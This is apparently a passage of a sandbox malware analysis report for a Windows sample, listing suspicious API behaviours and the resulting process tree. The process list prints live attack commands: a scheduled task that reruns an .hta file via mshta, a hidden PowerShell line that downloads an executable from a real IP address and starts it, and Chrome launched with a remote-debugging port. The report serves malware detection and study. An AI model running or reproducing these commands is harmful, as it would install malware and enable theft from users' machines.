N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4200 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 4200 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 4200 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 3148 wrote to memory of 632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3148 wrote to memory of 632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3148 wrote to memory of 632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4904 wrote to memory of 4180 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4904 wrote to memory of 4180 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4904 wrote to memory of 4180 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4180 wrote to memory of 2532 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE
PID 4180 wrote to memory of 2532 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE
PID 4180 wrote to memory of 2532 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE
PID 2532 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2532 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2532 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4072 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 4072 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 4072 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 5080 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5080 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 4628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 4628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 3684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 4780 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 4780 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1440 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe

"C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn O4T2ZmaFIyN /tr "mshta C:\Users\Admin\AppData\Local\Temp\2QhO5XQHn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\2QhO5XQHn.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn O4T2ZmaFIyN /tr "mshta C:\Users\Admin\AppData\Local\Temp\2QhO5XQHn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE

"C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff249dcc40,0x7fff249dcc4c,0x7fff249dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,5138827133026358583,9356898315235383168,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1896 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

